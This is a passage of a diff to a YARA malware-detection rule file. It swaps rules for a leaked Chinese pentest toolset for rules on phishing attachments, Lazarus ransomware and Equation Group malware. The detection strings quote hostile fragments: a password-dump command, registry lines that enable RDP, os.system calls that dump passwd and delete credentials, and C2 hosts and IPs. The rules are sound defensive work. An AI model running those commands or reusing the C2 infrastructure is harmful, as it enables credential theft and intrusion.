+		$iso_1 = "Lmlzb1BL"
+		$iso_2 = "5pc29QS"
+		$iso_3 = "uaXNvUE"
 
 	condition:
-		filesize < 3KB and all of them
+		filesize < 2000KB and 1 of ( $pk* ) and 1 of ( $iso* )
 }
-rule SIGNATURE_BASE_CN_Honker_Injection_Transit_Jmcook : FILE
+rule SIGNATURE_BASE_SUSP_Archive_Phishing_Attachment_Characteristics_Jun22_1 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file jmCook.asp"
+		description = "Detects characteristics of suspicious file names or double extensions often found in phishing mail attachments"
 		author = "Florian Roth (Nextron Systems)"
-		id = "468abb0e-a163-5fc5-b6a1-896fc04b8570"
-		date = "2015-06-23"
+		id = "3cb8c371-f40b-5773-84d1-3bce37da529e"
+		date = "2022-06-29"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L116-L131"
+		reference = "https://twitter.com/0xtoxin/status/1540524891623014400?s=12&t=IQ0OgChk8tAIdTHaPxh0Vg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_phish_attachments.yar#L43-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
-		logic_hash = "f7a9aca65b92d4b9c787d83a421b54a23844fa8e061c6c627ddde8ab5b7f4396"
-		score = 70
-		quality = 83
+		logic_hash = "647044fa3b5cf6f0e9e738fa7b7d24f8918b7a7fb359342e1314d97b50debf87"
+		score = 65
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "caaa5c5733fca95804fffe70af82ee505a8ca2991e4cc05bc97a022e5f5b331c"
+		hash2 = "a746d8c41609a70ce10bc69d459f9abb42957cc9626f2e83810c1af412cb8729"
 
 	strings:
-		$s1 = ".Open \"POST\",PostUrl,False" fullword ascii
-		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
+		$sa01 = "INVOICE.exePK" ascii
+		$sa02 = "PAYMENT.exePK" ascii
+		$sa03 = "REQUEST.exePK" ascii
+		$sa04 = "ORDER.exePK" ascii
+		$sa05 = "invoice.exePK" ascii
+		$sa06 = "payment.exePK" ascii
+		$sa07 = "_request.exePK" ascii
+		$sa08 = "_order.exePK" ascii
+		$sa09 = "-request.exePK" ascii
+		$sa10 = "-order.exePK" ascii
+		$sa11 = " request.exePK" ascii
+		$sa12 = " order.exePK" ascii
+		$sa14 = ".doc.exePK" ascii
+		$sa15 = ".docx.exePK" ascii
+		$sa16 = ".xls.exePK" ascii
+		$sa17 = ".xlsx.exePK" ascii
+		$sa18 = ".pdf.exePK" ascii
+		$sa19 = ".ppt.exePK" ascii
+		$sa20 = ".pptx.exePK" ascii
+		$sa21 = ".rtf.exePK" ascii
+		$sa22 = ".txt.exePK" ascii
+		$sb01 = "SU5WT0lDRS5leGVQS"
+		$sb02 = "lOVk9JQ0UuZXhlUE"
+		$sb03 = "JTlZPSUNFLmV4ZVBL"
+		$sb04 = "UEFZTUVOVC5leGVQS"
+		$sb05 = "BBWU1FTlQuZXhlUE"
+		$sb06 = "QQVlNRU5ULmV4ZVBL"
+		$sb07 = "UkVRVUVTVC5leGVQS"
+		$sb08 = "JFUVVFU1QuZXhlUE"
+		$sb09 = "SRVFVRVNULmV4ZVBL"
+		$sb10 = "T1JERVIuZXhlUE"
+		$sb11 = "9SREVSLmV4ZVBL"
+		$sb12 = "PUkRFUi5leGVQS"
+		$sb13 = "aW52b2ljZS5leGVQS"
+		$sb14 = "ludm9pY2UuZXhlUE"
+		$sb15 = "pbnZvaWNlLmV4ZVBL"
+		$sb16 = "cGF5bWVudC5leGVQS"
+		$sb17 = "BheW1lbnQuZXhlUE"
+		$sb18 = "wYXltZW50LmV4ZVBL"
+		$sb19 = "X3JlcXVlc3QuZXhlUE"
+		$sb20 = "9yZXF1ZXN0LmV4ZVBL"
+		$sb21 = "fcmVxdWVzdC5leGVQS"
+		$sb22 = "X29yZGVyLmV4ZVBL"
+		$sb23 = "9vcmRlci5leGVQS"
+		$sb24 = "fb3JkZXIuZXhlUE"
+		$sb25 = "LXJlcXVlc3QuZXhlUE"
+		$sb26 = "1yZXF1ZXN0LmV4ZVBL"
+		$sb27 = "tcmVxdWVzdC5leGVQS"
+		$sb28 = "LW9yZGVyLmV4ZVBL"
+		$sb29 = "1vcmRlci5leGVQS"
+		$sb30 = "tb3JkZXIuZXhlUE"
+		$sb31 = "IHJlcXVlc3QuZXhlUE"
+		$sb32 = "ByZXF1ZXN0LmV4ZVBL"
+		$sb33 = "gcmVxdWVzdC5leGVQS"
+		$sb34 = "IG9yZGVyLmV4ZVBL"
+		$sb35 = "BvcmRlci5leGVQS"
+		$sb36 = "gb3JkZXIuZXhlUE"
+		$sb37 = "LmRvYy5leGVQS"
+		$sb38 = "5kb2MuZXhlUE"
+		$sb39 = "uZG9jLmV4ZVBL"
+		$sb40 = "LmRvY3guZXhlUE"
+		$sb41 = "5kb2N4LmV4ZVBL"
+		$sb42 = "uZG9jeC5leGVQS"
+		$sb43 = "Lnhscy5leGVQS"
+		$sb44 = "54bHMuZXhlUE"
+		$sb45 = "ueGxzLmV4ZVBL"
+		$sb46 = "Lnhsc3guZXhlUE"
+		$sb47 = "54bHN4LmV4ZVBL"
+		$sb48 = "ueGxzeC5leGVQS"
+		$sb49 = "LnBkZi5leGVQS"
+		$sb50 = "5wZGYuZXhlUE"
+		$sb51 = "ucGRmLmV4ZVBL"
+		$sb52 = "LnBwdC5leGVQS"
+		$sb53 = "5wcHQuZXhlUE"
+		$sb54 = "ucHB0LmV4ZVBL"
+		$sb55 = "LnBwdHguZXhlUE"
+		$sb56 = "5wcHR4LmV4ZVBL"
+		$sb57 = "ucHB0eC5leGVQS"
+		$sb58 = "LnJ0Zi5leGVQS"
+		$sb59 = "5ydGYuZXhlUE"
+		$sb60 = "ucnRmLmV4ZVBL"
+		$sb61 = "LnR4dC5leGVQS"
+		$sb62 = "50eHQuZXhlUE"
+		$sb63 = "udHh0LmV4ZVBL"
 
 	condition:
-		filesize < 9KB and all of them
+		uint16( 0 ) == 0x4b50 and 1 of ( $sa* ) or 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_CN_Honker_Pwdump7_Pwdump7 : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_1 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file Pwdump7.bat"
+		description = "Detects Lazarus VHD Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "baf6ced6-4298-5453-a020-a384c923584c"
-		date = "2015-06-23"
+		id = "5cb3c136-ec5c-5596-8dcc-e4c6ef33050a"
+		date = "2020-10-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L133-L147"
+		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_vhd_ransomware.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "67d0e215c96370dcdc681bb2638703c2eeea188a"
-		logic_hash = "50e4ec9716b4e9d824fb301bb493dcdcd9782d87c0fb8040b82a87faf56292cb"
-		score = 70
+		logic_hash = "95c56c5111bb227da8f8a3f8aa4f23e1348bc76ff76a05fc3cae89f9fad1bb52"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
+		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
+		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
 
 	strings:
-		$s1 = "Pwdump7.exe >pass.txt" fullword ascii
+		$s1 = "HowToDecrypt.txt" wide fullword
+		$s2 = "rsa.cpp" wide fullword
+		$s3 = "sc stop \"Microsoft Exchange Compliance Service\"" ascii fullword
+		$op1 = { 8b 8d bc fc ff ff 8b 94 bd 34 03 00 00 33 c0 50 }
+		$op2 = { 8b 8d 98 f9 ff ff 8d 64 24 00 8b 39 3b bc 85 34 }
+		$op3 = { 8b 94 85 34 03 00 00 89 11 40 83 c1 04 3b 06 7c }
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Portrecall_Pr : FILE
+rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_2 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file pr"
+		description = "Detects Lazarus VHD Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1e137ed0-3af6-5b01-a27b-87bf42359887"
-		date = "2015-06-23"
+		id = "b75668de-93e6-57e7-90f0-fa335295be7c"
+		date = "2020-10-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L149-L165"
+		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_vhd_ransomware.yar#L26-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "583cf6dc2304121d835f2879803a22fea76930f3"
-		logic_hash = "f33373e87887506651b1fac464f860a3cf18ad681ba124b606524f6f2255e693"
-		score = 70
+		logic_hash = "cf28771a854b3bacc911375c09f6c6bc6ddebff95612a509890c56a5a14e8921"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "097ca829e051a4877bca093cee340180ff5f13a9c266ad4141b0be82aae1a39b"
+		hash2 = "73a10be31832c9f1cbbd798590411009da0881592a90feb472e80025dfb0ea79"
 
 	strings:
-		$s1 = "Usage: Same as lcx.exe in win32 :)" fullword ascii
-		$s2 = "connect to client" fullword ascii
-		$s3 = "PR(Packet redirection) for linux " fullword ascii
+		$op1 = { f9 36 88 08 8d ad fc ff ff ff 66 ff c1 e9 72 86 }
+		$op2 = { c6 c4 58 0f a4 c8 12 8d ad ff ff ff ff 0f b6 44 }
+		$op3 = { 88 02 66 c1 f0 54 8d bf fc ff ff ff 0f ba e0 19 }
 
 	condition:
-		filesize < 70KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_3 : FILE
+rule SIGNATURE_BASE_Apt_Equation_Exploitlib_Mutexes : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ff61a5cb-6089-5632-a65d-09f4ffd99857"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L167-L183"
+		description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
+		author = "Kaspersky Lab"
+		id = "d060bfd7-fb16-55d3-8a39-1197fdd8e759"
+		date = "2016-02-15"
+		modified = "2023-01-27"
+		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L3-L20"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "4414dd4ca16d08b8edad26842640960ace434cdde769766fb1c38a1a249565fd"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		version = "1.0"
+
+	strings:
+		$a1 = "prkMtx" wide
+		$a2 = "cnFormSyncExFBC" wide
+		$a3 = "cnFormVoidFBC" wide
+		$a4 = "cnFormSyncExFBC"
+		$a5 = "cnFormVoidFBC"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and any of ( $a* )
+}
+rule SIGNATURE_BASE_Apt_Equation_Equationlaser_Runtimeclasses
+{
+	meta:
+		description = "Rule to detect the EquationLaser malware"
+		author = "Kaspersky Lab"
+		id = "924c80ca-3607-57aa-85a2-b33ff52b0c1b"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L40-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cfedec7bd327897694f83501d76063fe16b13450"
-		logic_hash = "df07958e44c7896bc7bdf2b79bc95969593eb21b9c9ed51213fd15affb731ec2"
-		score = 70
+		logic_hash = "663ea56f869f7099a92658df5bddd76d4e5ba8ac5dfc693733579682b9eee860"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$s1 = "echo \"fDenyTSConnections\"=dword:00000000>>3389.reg " fullword ascii
-		$s2 = "echo \"PortNumber\"=dword:00000d3d>>3389.reg " fullword ascii
-		$s3 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>" ascii
+		$a1 = "?a73957838_2@@YAXXZ"
+		$a2 = "?a84884@@YAXXZ"
+		$a3 = "?b823838_9839@@YAXXZ"
+		$a4 = "?e747383_94@@YAXXZ"
+		$a5 = "?e83834@@YAXXZ"
+		$a6 = "?e929348_827@@YAXXZ"
 
 	condition:
-		filesize < 2KB and all of them
+		any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_D : FILE
+rule SIGNATURE_BASE_Apt_Equation_Cryptotable
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file D.ASP"
-		author = "Florian Roth (Nextron Systems)"
-		id = "88529577-0dea-5aa8-b763-79a69397ddd5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L185-L203"
+		description = "Rule to detect the crypto library used in Equation group malware"
+		author = "Kaspersky Lab"
+		id = "e7f313a3-8ef8-5363-898a-836a96aaa2ff"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L59-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "de9cd4bd72b1384b182d58621f51815a77a5f07d"
-		logic_hash = "2eca697dd1f2ad80c5cd71507cd5f8abd2364b11dfe3206a1043e3d4f5835797"
-		score = 70
+		logic_hash = "e660fe423330334a1e3167d6a45e5ce2469fec276838618a7cb0340ec8172275"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$s0 = "Paths_str=\"c:\\windows\\\"&chr(13)&chr(10)&\"c:\\Documents and Settings\\\"&chr" ascii
-		$s1 = "CONST_FSO=\"Script\"&\"ing.Fil\"&\"eSyst\"&\"emObject\"" fullword ascii
-		$s2 = "Response.Write \"<form id='form1' name='form1' method='post' action=''>\"" fullword ascii
-		$s3 = "set getAtt=FSO.GetFile(filepath)" fullword ascii
-		$s4 = "Response.Write \"<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' chec" ascii
+		$a = {37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
 
 	condition:
-		filesize < 30KB and 2 of them
+		$a
 }
-rule SIGNATURE_BASE_CN_Honker_Chinachopper_Db : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_1 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file db.mdb"
+		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1314e204-d3f5-5f0a-bb74-dc774fef3d3c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L205-L221"
+		id = "8d2adb3c-70e0-5768-bcfa-be64220064d9"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L75-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "af79ff2689a6b7a90a5d3c0ebe709e42f2a15597"
-		logic_hash = "b650498df99c4620e3904ce8980cd58eb0cb5e0a7a275d54bdbcc41a687bec8e"
-		score = 70
+		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
+		logic_hash = "cfa3c1756c8dfb04e0a1590f76cad6d5b3878000d220c263d199322cf6a4f58a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://www.maicaidao.com/server.phpcaidao" fullword wide
-		$s2 = "<O>act=login</O>" fullword wide
-		$s3 = "<H>localhost</H>" fullword wide
+		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
+		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
+		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
+		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
+		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
+		$s5 = "Chrome" fullword wide
+		$s6 = "StringIndex" fullword ascii
+		$x1 = "itemagic.net@443" fullword wide
+		$x2 = "team4heat.net@443" fullword wide
+		$x5 = "62.216.152.69@443" fullword wide
+		$x6 = "84.233.205.37@443" fullword wide
+		$z1 = "www.microsoft.com@80" fullword wide
+		$z2 = "www.google.com@80" fullword wide
+		$z3 = "127.0.0.1:3128" fullword wide
 
 	condition:
-		filesize < 340KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300000 and ( ( all of ( $s* ) and all of ( $z* ) ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Syconfig : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Doublefantasy_1 : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file syconfig.dll"
+		description = "Equation Group Malware - DoubleFantasy"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3850007d-20d5-5b10-a549-dc4655877c6e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L223-L237"
+		id = "f3c87adf-86c3-5d7c-9532-75341841869a"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L109-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ff75353df77d610d3bccfbffb2c9dfa258b2fac9"
-		logic_hash = "6b7f918b83bac84df5ac6b247d4162dd385aba0a32570366c62fc4830199e86e"
-		score = 70
+		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
+		logic_hash = "4471601300616b5442de95a3eb23c28563206f3423b57fe81007d005203a439f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "Hashq.CrackHost+FormUnit" fullword ascii
+		$z1 = "msvcp5%d.dll" fullword ascii
+		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
+		$s3 = "actxprxy.DllGetClassObject" fullword ascii
+		$s5 = "actxprxy.DllRegisterServer" fullword ascii
+		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
+		$x2 = "191H1a1" fullword ascii
+		$x3 = "November " fullword ascii
+		$x4 = "abababababab" fullword ascii
+		$x5 = "January " fullword ascii
+		$x6 = "October " fullword ascii
+		$x7 = "September " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x0100 and filesize < 18KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 350000 and ( ( $z1 ) or ( all of ( $s* ) and 6 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Linux_Bin : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_GROK_Keylogger : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file linux_bin"
+		description = "Equation Group Malware - GROK keylogger"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c56a4a8-6392-517c-a16e-63785799acb9"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L239-L254"
+		id = "1bae3e86-54e5-55e9-8bbd-aa9ec2a0fa2b"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L140-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "26e71e6ebc6a3bdda9467ce929610c94de8a7ca0"
-		logic_hash = "d02fcf23e46a0b6d44c382e34d73ef6239b6a1afc690e417aa0e6b0898e277c0"
-		score = 70
+		hash = "50b8f125ed33233a545a1aac3c9d4bb6aa34b48f"
+		logic_hash = "502afd23b92e948a8fba33ccc4da2f4b1ec91bce5a24d153ffc545129fd8c9fa"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "client.sin_port = htons(atoi(argv[3]));" fullword ascii
-		$s2 = "printf(\"\\n\\n*********Waiting Client connect*****\\n\\n\");" fullword ascii
+		$s0 = "c:\\users\\rmgree5\\" ascii
+		$s1 = "msrtdv.sys" fullword wide
+		$x1 = "svrg.pdb" fullword ascii
+		$x2 = "W32pServiceTable" fullword ascii
+		$x3 = "In forma" fullword ascii
+		$x4 = "ReleaseF" fullword ascii
+		$x5 = "criptor" fullword ascii
+		$x6 = "astMutex" fullword ascii
+		$x7 = "ARASATAU" fullword ascii
+		$x8 = "R0omp4ar" fullword ascii
+		$z1 = "H.text" fullword ascii
+		$z2 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$z4 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\Environment" wide fullword
 
 	condition:
-		filesize < 20KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 250000 and ( $s0 or ( $s1 and 6 of ( $x* ) ) or ( 6 of ( $x* ) and all of ( $z* ) ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Intersect2_Beta : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Greyfishinstaller
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py"
+		description = "Equation Group Malware - Grey Fish"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d20da18d-f8c9-5eb3-8d5d-c8816cff3200"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L256-L272"
+		id = "ea16b51c-755e-5f08-a209-d21a1ed30fcf"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L174-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3ba5f720c4994cd4ad519b457e232365e66f37cc"
-		logic_hash = "bc6a83f8f851f7fb5b620be889619fcbd9f34ba27d495c2040e207caf95854bb"
-		score = 70
+		hash = "58d15d1581f32f36542f3e9fb4b1fc84d2a6ba35"
+		logic_hash = "dae6963f3210503c6c86c818a9cd6f309ba7876f14ca42966097023d474a2366"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "os.system(\"ls -alhR /home > AllUsers.txt\")" fullword ascii
-		$s2 = "os.system('getent passwd > passwd.txt')" fullword ascii
-		$s3 = "os.system(\"rm -rf credentials/\")" fullword ascii
+		$s0 = "DOGROUND.exe" fullword wide
+		$s1 = "Windows Configuration Services" fullword wide
+		$s2 = "GetMappedFilenameW" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 50KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_IIS_Logcleaner1_0_Readme : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Equationdruginstaller : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file readme.txt"
+		description = "Equation Group Malware - EquationDrug installer LUTEUSOBSTOS"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6f3605ab-cf9d-5f6b-8d89-6269976c5b0b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_scripts.yar#L274-L289"
+		id = "fa549e6e-f0d8-55ea-9ec9-c8ec53b55dec"
+		date = "2015-02-16"
+		modified = "2025-03-29"
+		reference = "http://goo.gl/ivt8EW"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L191-L213"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2ab47d876b49e9a693f602f3545381415e82a556"
-		logic_hash = "3cbd7b2e1710c78bc8ab8d2730cc6da8eb95038f8431d5d0081db984b3d706cf"
-		score = 70
+		hash = "61fab1b8451275c7fd580895d9c68e152ff46417"
+		logic_hash = "815ed47a53bbc5f6c3fec3464336863028e804bde4681526ecac5de0cfff21b4"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "LogCleaner.exe <ip> [Logpath]" fullword ascii
-		$s3 = "http://l-y.vicp.net" fullword ascii
+		$s0 = "\\system32\\win32k.sys" wide
+		$s1 = "ALL_FIREWALLS" fullword ascii
+		$x1 = "@prkMtx" fullword wide
+		$x2 = "STATIC" fullword wide
+		$x3 = "windir" fullword wide
+		$x4 = "cnFormVoidFBC" fullword wide
+		$x5 = "CcnFormSyncExFBC" fullword wide
+		$x6 = "WinStaObj" fullword wide
+		$x7 = "BINRES" fullword wide
 
 	condition:
-		filesize < 7KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500000 and all of ( $s* ) and 5 of ( $x* )
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_Command : FILE
+rule SIGNATURE_BASE_Equation_Kaspersky_Equationlaserinstaller : FILE
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file command.txt"
